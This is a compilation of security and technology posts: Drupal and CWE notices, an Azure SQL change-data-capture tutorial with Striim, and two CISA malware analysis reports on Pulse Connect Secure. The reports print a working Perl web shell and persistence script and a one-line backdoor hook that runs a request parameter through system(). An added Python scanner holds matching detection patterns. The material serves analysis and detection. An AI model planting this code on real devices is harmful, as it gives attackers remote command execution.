Drupal Releases Security Updates

This article is contributed. See the original author and article here.

Drupal has released security updates to address a critical third-party-library vulnerability that could affect Drupal 7, 8.9, 9.1, and 9.2. An attacker could exploit this vulnerability to take control of an affected system.

CISA encourages users and administrators to review the Drupal security advisory and apply the necessary updates.

2021 CWE Top 25 Most Dangerous Software Weaknesses

The Homeland Security Systems Engineering and Development Institute, sponsored by the Department of Homeland Security and operated by MITRE, has released the 2021 Common Weakness Enumeration (CWE) Top 25 Most Dangerous Software Weaknesses list. The Top 25 uses data from the National Vulnerability Database (NVD) to compile the most frequent and critical errors that can lead to serious vulnerabilities in software. An attacker can often exploit these vulnerabilities to take control of an affected system, obtain sensitive information, or cause a denial-of-service condition.

CISA encourages users and administrators to review the Top 25 list and evaluate recommended mitigations to determine those most suitable to adopt.

Stream Data Changes from a CDC-Enabled Azure SQL Database to an External Target Using Striim

This blog is part of the Change Data Capture in Azure SQL Databases Blog Series, which started with the announcement on releasing CDC in Azure SQL Databases in early June 2021. You can view the release announcement here: https://aka.ms/CDCAzureSQLDB

Introducing Change Data Capture in Azure SQL Databases

Change data capture (CDC) provides historical change information for a user table by capturing both the fact that Data Manipulation Language (DML) changes (insert / update / delete) were made and the changed data. Changes are captured in real time by using a capture process that reads changes from the transaction log and places them in corresponding change tables. These change tables provide a historical view of the changes made over time to source tables. CDC functions enable the change data to be consumed easily and systematically.

CDC is now available in public preview in Azure SQL Database, enabling customers to track data changes on their Azure SQL Database tables in near real time. CDC in this PaaS offering provides functionality similar to SQL Server and Azure SQL Managed Instance CDC, including a scheduler that automatically runs the change capture and cleanup processes on the change tables.

Streaming Change Data to External Targets

Data integration platforms such as Striim can integrate with your CDC-enabled Azure SQL Database to stream data changes to diverse targets in real-time. 

“Real-time information is vital to the health of enterprises,” says Codin Pora, VP of Technology and Partnership at Striim. “Striim is excited to support the new change data capture (CDC) capabilities of Azure SQL Database and help companies drive their digital transformation by bringing together data, people, and processes. Striim, through its Azure SQL Database CDC pipelines, provides real-time data for analytics and intelligence workloads, operational reporting, ML/AI implementations and many other use cases, creating value as well as competitive advantage in a digital-first world. Striim builds continuous streaming data pipelines with minimal overhead on the source Azure SQL Database systems, while moving database operations (inserts, updates, and deletes) in real time with security, reliability, and transactional integrity.”

To learn more about using Striim for real-time ETL to Azure SQL Databases, go here. You can also try out setting up an ETL pipeline to your chosen Azure SQL Database by using Striim’s free trial.

Current Use Case

For this tutorial, we will use Striim to send CDC change data from an Azure SQL Database to another Azure SQL Database target in a separate region. The source database is enabled for CDC, and so is each table that is tracked for data changes. To learn more about enabling and disabling CDC on databases and tables, go here.

Striim will connect to the source database and push CDC changes from the change tables to the downstream target. This is helpful for customer scenarios such as global data synchronization (keeping databases in different regions around the world synchronized) or distributed applications (synchronizing data across databases that store diverse workloads).

Steps for Sending CDC Data Changes from an Azure SQL Database with Striim

  1. Create, purchase and deploy your solution by following these steps: Striim with Azure Storage or SQL Database.

  2. In the Striim web GUI, go to the Apps section.

  3. Click on the Add App button to start a new app. Given our scenario, we will start a new app from scratch by clicking on the Start From Scratch button. Depending on your use case, you might need one app to run an initial snapshot of your source database and a separate app to replicate incremental changes using CDC. For this scenario, you will get zero-downtime migration. However, you might decide to execute your initial load outside of Striim by using backup and restore tools. For the purposes of this demo, we will have two apps: one for running an initial load (SQLDBInitLoadTest app) and one for replicating incremental changes from the source to the target database, for which CDC needs to be enabled on the source database (SQLDBCDCTest app).

  4. We will start with the SQLDBInitLoadTest app configuration. In the Name your App section, give your app a name and a namespace (namespaces are logical groupings of applications). Click Save.

  5. From the drag-and-drop Striim web UI, select your source, which in our case will be SQLDbInitLoad_source DatabaseReader. Learn more about Database Readers here. Configure the Adapter, Connection URL (JDBC), Username, Password, and the Output, which can be either new or existing. You can select the Tables to read from as well. In our case, we will send the initial load to the SQLDbInitLoad_stream, which will send it down to the target.

  6. When configuring the target, in our case SQLDbInitLoad_target, edit the Adapter (DatabaseWriter), Connection URL (JDBC), Username, Password, and Tables (comma-separated pairs of source-target tables).

  7. Once you have configured the source, stream, and target, Deploy the app and Start the app. The initial snapshot of the source database should show up in the target database. If there are errors starting the app, you can use the Message Log for debugging, then Undeploy the app and Resume again once the errors have been fixed. In case of networking errors, make sure that your client IP address is allowed to access the database server; you can enable access within the Azure Portal (Update Server Firewall Rules).

  8. As your application is running, you can monitor the progress of the replication, as seen in the screenshot below. Once the initial load is completed, check your target database and confirm that it is in sync with the source.

  9. Now that the initial load is complete, we will configure the app for replicating incremental changes from source to target. For this step, CDC must be enabled on the source database and on the tracked tables. To learn more about enabling and disabling CDC on databases and tables, go here.

  10. Similar to configuring your source/stream/target on the SQLDbInitLoadTest app, now go to the SQLDBCDCTest app and configure your source (SQLDBCDC_source), stream (SQLDBCDC_stream), and target (SQLDBCDC_target).

  11. Deploy and Start the app. Your incremental data changes should be replicating to the target.
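As an added example (not from the original post or from Striim), the T-SQL that sets up the CDC prerequisites the use case and the incremental-changes step depend on: enabling CDC on the source database and on a table, gating read access to the change data through a database role, and reading the captured changes in LSN order the way a downstream consumer such as Striim's CDC reader does. The dbo.Orders table, the cdc_reader role and the striim_user login are assumptions.

```sql
-- Added example, not from the original post or from Striim.
-- Assumptions: a source Azure SQL Database, a constructed table dbo.Orders,
-- a database role cdc_reader and a replication user striim_user.

-- 1. Enable CDC at the database level (requires db_owner).
EXEC sys.sp_cdc_enable_db;
SELECT name, is_cdc_enabled FROM sys.databases WHERE name = DB_NAME();

-- Constructed source table for the walkthrough.
CREATE TABLE dbo.Orders (
    OrderId  INT           NOT NULL PRIMARY KEY,
    Customer NVARCHAR(100) NOT NULL,
    Amount   DECIMAL(10,2) NOT NULL,
    Status   VARCHAR(20)   NOT NULL
);

-- 2. Enable CDC on the table. @role_name gates access to the change data:
--    only members of cdc_reader (and db_owner) can read cdc.dbo_Orders_CT,
--    so the replication login gets that role and nothing broader.
CREATE ROLE cdc_reader;
EXEC sys.sp_cdc_enable_table
    @source_schema        = N'dbo',
    @source_name          = N'Orders',
    @role_name            = N'cdc_reader',
    @supports_net_changes = 1;   -- requires the primary key declared above
ALTER ROLE cdc_reader ADD MEMBER striim_user;   -- hypothetical replication user

-- Confirm the capture instance exists and which columns it tracks.
SELECT name, is_tracked_by_cdc FROM sys.tables WHERE name = N'Orders';
EXEC sys.sp_cdc_help_change_data_capture
    @source_schema = N'dbo', @source_name = N'Orders';

-- 3. Generate DML for the scheduled capture process to pick up.
INSERT INTO dbo.Orders VALUES (1, N'Alice', 120.00, 'new');
INSERT INTO dbo.Orders VALUES (2, N'Bob',    75.50, 'new');
UPDATE dbo.Orders SET Status = 'shipped' WHERE OrderId = 1;
DELETE FROM dbo.Orders WHERE OrderId = 2;

-- 4. Read every captured change in commit order, as a consumer would.
--    Rows appear only after the capture job has run; __$operation is
--    1 = delete, 2 = insert, 3 = update (before image), 4 = update (after image).
DECLARE @from_lsn BINARY(10) = sys.fn_cdc_get_min_lsn('dbo_Orders');
DECLARE @to_lsn   BINARY(10) = sys.fn_cdc_get_max_lsn();

SELECT __$start_lsn, __$seqval, __$operation, OrderId, Customer, Amount, Status
FROM   cdc.fn_cdc_get_all_changes_dbo_Orders(@from_lsn, @to_lsn, N'all update old')
ORDER  BY __$start_lsn, __$seqval;

-- Net view: one row per key with its final state, which lets a target apply
-- the batch idempotently (the deleted OrderId 2 never reaches the target).
SELECT __$operation, OrderId, Customer, Amount, Status
FROM   cdc.fn_cdc_get_net_changes_dbo_Orders(@from_lsn, @to_lsn, N'all');
```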

One of the benefits of Striim is that it supports in-flight transformations and processing as the data flows through its in-memory data pipelines, allowing filtering, aggregation, enrichment, and alerting in real time. Many transformations are available out of the box as drag-and-drop items in the Striim Flow Designer for a variety of popular operations, and Striim Continuous Query (CQ) functionality allows users to write their own custom SQL to run on and act on their streaming data as it flows through the pipeline.

Blog Series for Change Data Capture in Azure SQL Databases

We are happy to continue the bi-weekly blog series for customers who’d like to learn more about enabling CDC in their Azure SQL Databases! This series explores different features/services that can be integrated with CDC to enhance change data functionality.

MAR-10336935-1.v1: Pulse Connect Secure

Malware Analysis Report

10336935.r1.v1

2021-07-14

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received one file for analysis. The file is a Pulse Secure system application that has been modified by a malicious cyber actor. The file contains Common Gateway Interface (CGI) code designed to modify several Pulse Secure system files using the sed command. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10336935-1.v1.WHITE.stix.

Submitted Files (1)

64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7 (DSUpgrade.pm)

Findings

64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7

Tags

webshell

Details

Name: DSUpgrade.pm
Size: 9783 bytes
Type: Perl5 module source, ASCII text
MD5: 5009b307214abc4ba5e24fa99133b934
SHA1: afc52937829c78cb14ec087e66e39be3571e00ca
SHA256: 64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7
SHA512: 97646de4d68a303fba971c6c83f6077125d4e6e2c02bbeee22881855265c8307fd66c391489aaafdf640e1316e1b63978c66ecadfb04f37bc6755a9e607b129d
ssdeep: 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBN0G2BiF3Ar8yXpayc:eIB1X1phiJ/irZN0G2BiF3CjCswmPyVv
Entropy: 5.228827

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a legitimate Pulse Secure Perl application with malicious CGI code patched in. The malicious CGI code is designed to modify several Pulse Secure system files using the sed command.

--Begin Patched In Commented CGI Code--
##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/##start_total/,/##end_total/w K872Bu' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/##cgistart1/,/##cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/##cgistart2/,/##cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/##cgistart1/,/##cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/##cgistart2/,/##cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/usr/bin/gzip -d /tmp/new-pack.tgz");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
       system("/bin/rm -f K872Bu");
       system("/bin/rm -f Mj1Za");
       system("/bin/rm -f 1uMfVB");
       system("/bin/rm -fr root");
       system("rm -f /tmp/new-pack.tgz");
       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
}
else{
system("/bin/sed -i '/##start_total/,/##end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/##perlstart/,/##perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/##scriptstart/,/##scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}

##perlend

###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/##start_total/,/##end_total/w 7CxA1p' outer-do-install
#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/##cgistart1/,/##cgiend1/w GqTv3w' outer-do-install
#/bin/sed -i '/##cgistart2/,/##cgiend2/w Vi6d8h4' outer-do-install
#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/##cgistart1/,/##cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/##cgistart2/,/##cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/##perlstart/,/##perlend/s/#//' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/##scriptstart/,/##scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend

###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
#    my ($var, $value) = split('=', $pair, 2);
#
#    if($var) {
#     $value =~ s/\+/ /g ;
#     $value =~ s/%(..)/pack('c',hex($1))/eg;
#
#     $ret{$var} = $value;
#    }
# }
#
# return %ret;
#}
###cgiend1

###cgistart2
#    my $enckey='1234567';
#    my $data='1234567812345678';
#        my $cipher = RC4($enckey, $data);
#        my $encode = MIME::Base64::encode($cipher);
#    my $psalLaunch = CGI::param("CPrimerPlus");
#    if ($psalLaunch =~ /<REDACTED>/)
#    {
#    my ($cmd, %FORM);
#
#    $|=1;
#
#    print "Content-Type: text/html\r\n";
#    print "\r\n";
#    %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
#    if(defined $FORM{'cmd'}) {
#     $cmd = $FORM{'cmd'};
#    }
#
#print '<HTML>
#<body>
#<form action="" method="GET">
#<input type="text" name="cmd" size=45 value="' . $cmd . '">
#<input type="text" name="CPrimerPlus" size=45 value="<REDACTED>">
#<input type="submit" value="Run">
#</form>
#<pre>';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "</pre>";
# exit(0);
#    }
###cgiend2
--End Patched In Commented CGI Code--

Recommendations

CISA recommends that users and administrators consider using the following best practices to strengthen the security posture of their organization’s systems. Any configuration changes should be reviewed by system owners and administrators prior to implementation to avoid unwanted impacts.

  • Maintain up-to-date antivirus signatures and engines.
  • Keep operating system patches up-to-date.
  • Disable File and Printer sharing services. If these services are required, use strong passwords or Active Directory authentication.
  • Restrict users’ ability (permissions) to install and run unwanted software applications. Do not add users to the local administrators group unless required.
  • Enforce a strong password policy and implement regular password changes.
  • Exercise caution when opening e-mail attachments even if the attachment is expected and the sender appears to be known.
  • Enable a personal firewall on agency workstations, configured to deny unsolicited connection requests.
  • Disable unnecessary services on agency workstations and servers.
  • Scan for and remove suspicious e-mail attachments; ensure the scanned attachment is its “true file type” (i.e., the extension matches the file header).
  • Monitor users’ web browsing habits; restrict access to sites with unfavorable content.
  • Exercise caution when using removable media (e.g., USB thumb drives, external drives, CDs, etc.).
  • Scan all software downloaded from the Internet prior to executing.
  • Maintain situational awareness of the latest threats and implement appropriate Access Control Lists (ACLs).

Additional information on malware incident prevention and handling can be found in National Institute of Standards and Technology (NIST) Special Publication 800-83, “Guide to Malware Incident Prevention & Handling for Desktops and Laptops”.

Contact Information

CISA continuously strives to improve its products and services. You can help by answering a very short series of questions about this product at the following URL: https://us-cert.cisa.gov/forms/feedback/

Document FAQ

What is a MIFR? A Malware Initial Findings Report (MIFR) is intended to provide organizations with malware analysis in a timely manner. In most instances this report will provide initial indicators for computer and network defense. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

What is a MAR? A Malware Analysis Report (MAR) is intended to provide organizations with more detailed malware analysis acquired via manual reverse engineering. To request additional analysis, please contact CISA and provide information regarding the level of desired analysis.

Can I edit this document? This document is not to be edited in any way by recipients. All comments or questions related to this document should be directed to CISA at 1-888-282-0870 or the CISA Service Desk.

Can I submit malware to CISA? Malware samples can be submitted via three methods:

CISA encourages you to report any suspicious activity, including cybersecurity incidents, possible malicious code, software vulnerabilities, and phishing-related scams. Reporting forms can be found on CISA’s homepage at www.cisa.gov.

MAR-10336161-1.v1: Pulse Connect Secure

Malware Analysis Report

10336161.r1.v1

2021-07-14

Notification

This report is provided “as is” for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE–Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

CISA received one file for analysis. This file is a Pulse Secure system application that has been modified. The modification effectively allows a remote operator to have command and control (C2) capabilities over a compromised Pulse Secure device. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10336161-1.v1.WHITE.stix.

Submitted Files (1)

c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16 (tnchcupdate.cgi)

Findings

c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16

Tags

backdoor, remote-access-trojan, trojan, webshell

Details

Name: tnchcupdate.cgi
Size: 27958 bytes
Type: Perl script text executable
MD5: a3b98da94d6d65745df01314a5a5d0f5
SHA1: 168a7b58875f8c4dfeb9ea311db7ce7275295c74
SHA256: c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16
SHA512: 76831761fcd068589ff4ec89b00371548b430edce57ede913ef0e11f9a962c8addc15a751c3865a6c44cabbf8068f45c089600ca7b2ebbac2e4ab129bf3b0bad
ssdeep: 384:F/XaWMIVzjJVreteR03LD/AxrYjVRzptulRvU71F2K9gjOTU:F/Xa94jJVrete2gxrYj34vU7/2K2CU
Entropy: 4.919656

Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Common Gateway Interface (CGI) script with a modification that allows a remote operator to execute commands on the compromised Pulse Secure device. The following modification hooks the script's main() function:

--Begin Malicious Main() Hook Code--

if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}

--End Malicious Main() Hook Code--

This hook checks for an incoming parameter to the web application named "id". If such a parameter is passed, its value is extracted and executed on the target system using the system() function. If no "id" parameter is provided, the code simply calls the original main() function.
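A triage helper for the two reports above (MAR-10336935-1.v1 and MAR-10336161-1.v1), added here as an example and not CISA's code: it compares a file's SHA256 against the two indicators listed in the reports and, because a modified file will not hash-match once an operator re-patches it, also looks for the section markers the DSUpgrade.pm patch carves out with sed and for the command-execution shapes visible in both listings. The samples at the bottom are constructed strings, not files taken from a device.

```python
"""Triage helper for Pulse Connect Secure Perl/CGI files (added example)."""
import hashlib
import re
import sys
from pathlib import Path

# SHA256 values as listed in the two reports.
KNOWN_BAD_SHA256 = {
    "64c87520565165ac95b74d6450b3ab8379544933dd3e2f2c4dc9b03a3ec570a7":
        "DSUpgrade.pm (MAR-10336935-1.v1)",
    "c964594ed0afaf64611514eb53f14ee5ab95e25da986dca9e28586bfc053da16":
        "tnchcupdate.cgi (MAR-10336161-1.v1)",
}

# Comment markers the DSUpgrade.pm patch uses to carve out its own sections.
SECTION_MARKERS = (
    "##start_total", "##end_total", "##perlstart", "##perlend",
    "##scriptstart", "##scriptend", "##cgistart1", "##cgiend1",
    "##cgistart2", "##cgiend2",
)

# Behavioural patterns taken from the listings in both reports. They match
# inside comments too, because the web shell ships commented out.
PATTERNS = {
    # a request parameter stored in a scalar and passed straight to system()
    "param_to_system": re.compile(
        r'(\$\w+)\s*=\s*CGI::param\([^)]*\).*?system\s*\(?\s*"?\1"?\s*\)?\s*;',
        re.S),
    # system with a bare scalar and no parentheses, as in the cgistart2 block
    "bare_system_scalar": re.compile(r'\bsystem\s+\$\w+\s*;'),
    # root filesystem remounted read-write before system files are replaced
    "remount_rw": re.compile(r'mount\s+-o\s+remount,rw\s+/dev/root'),
    # in-place sed edits of the Pulse Secure files named in the report
    "sed_inplace_system_file": re.compile(
        r'sed\s+-i\s+.*?(DSUpgrade\.pm|licenseserverproto\.cgi|outer-do-install)'),
}


def sha256_of(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def scan_text(text: str) -> dict:
    """Return which section markers and behavioural patterns occur in text."""
    return {
        "markers": [m for m in SECTION_MARKERS if m in text],
        "patterns": [name for name, rx in PATTERNS.items() if rx.search(text)],
    }


def scan_file(path: str) -> dict:
    """Hash a file, compare it to the known indicators and scan its content."""
    data = Path(path).read_bytes()
    result = scan_text(data.decode("utf-8", errors="replace"))
    result["sha256"] = sha256_of(data)
    result["known_bad"] = KNOWN_BAD_SHA256.get(result["sha256"])
    result["suspicious"] = bool(
        result["known_bad"] or result["markers"] or result["patterns"])
    return result


# Constructed samples for a stand-alone run (strings, not files from a device).
# HOOK_SAMPLE is the main() hook quoted in MAR-10336161-1.v1.
HOOK_SAMPLE = ('if(CGI::param("id")){print "Cache-Control: no-cache\\n";'
               'print "Content-type: text/html\\n\\n";my $na=CGI::param("id");'
               'system("$na");}else{&main();}')
BENIGN_SAMPLE = 'use strict;\nsub main { print "ok\\n"; }\nmain();\n'

if __name__ == "__main__":
    for label, sample in (("hook", HOOK_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, scan_text(sample))
    for arg in sys.argv[1:]:          # scan real files named on the command line
        print(arg, scan_file(arg))
```

A clean Pulse Secure file of the same name should produce no markers and no patterns; any hit is a prompt to compare the file against a known-good image of the same release rather than proof of compromise by itself.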
